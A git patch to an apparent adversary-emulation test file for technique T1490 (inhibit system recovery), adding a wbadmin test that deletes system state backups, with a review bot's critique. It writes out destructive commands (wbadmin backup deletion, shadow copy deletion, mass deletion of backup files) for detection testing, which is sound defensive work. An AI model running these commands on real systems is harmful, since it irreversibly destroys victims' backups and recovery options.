From 373176bcba85f4ae978b2cd24c06cfd85fe327d5 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Sat, 23 Jan 2021 17:53:20 -0700
Subject: [PATCH] T1490 - WBAdmin (#1375)

* Added wbadmin delete systemstatebackup

* Update T1490.yaml

Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
---
 atomics/T1490/T1490.yaml | 15 ++++++++++++---
 1 file changed, 12 insertions(+), 3 deletions(-)

diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index d0f6568e..aea49d27 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -37,7 +37,7 @@ atomic_tests:
 wmic.exe shadowcopy delete
 name: command_prompt
 elevation_required: true
-- name: Windows - Delete Windows Backup Catalog
+- name: Windows - wbadmin Delete Windows Backup Catalog
 auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c
 description: |
 Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
@@ -46,7 +46,7 @@ atomic_tests:
 - windows
 executor:
 command: |
- wbadmin.exe delete catalog -quiet
+ wbadmin delete catalog -quiet
 name: command_prompt
 elevation_required: true
 - name: Windows - Disable Windows Recovery Console Repair
@@ -91,4 +91,13 @@ atomic_tests:
 del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
 name: command_prompt
 elevation_required: true
-
+- name: Windows - wbadmin Delete systemstatebackup
+ description: |
+ Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ wbadmin delete systemstatebackup -keepVersions:0
+ name: command_prompt
+ elevation_required: true
\ No newline at end of file
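Review bot: The new `wbadmin delete systemstatebackup -keepVersions:0` command in the last hunk omits `-quiet`, so on a host where the subcommand applies wbadmin will normally stop for a Y/N confirmation and a non-interactive atomic runner will hang or abort instead of exercising the behavior; the sibling catalog test in the second hunk does pass `-quiet`, so `wbadmin delete systemstatebackup -keepVersions:0 -quiet` would keep the two consistent. The test is also irreversibly destructive (`-keepVersions:0` discards every system state backup) with no cleanup and no dependency check, so consider a `dependencies` stanza whose `prereq_command` verifies that wbadmin / the Windows Server Backup feature is present, and add a sentence to the description such as "WARNING: this deletes all existing system state backups and cannot be undone; run only on a disposable test host." The added entry lacks the `auto_generated_guid` the neighbouring tests carry, which is fine if the repository's CI fills it in on merge but otherwise should be added, and the file now ends without a trailing newline.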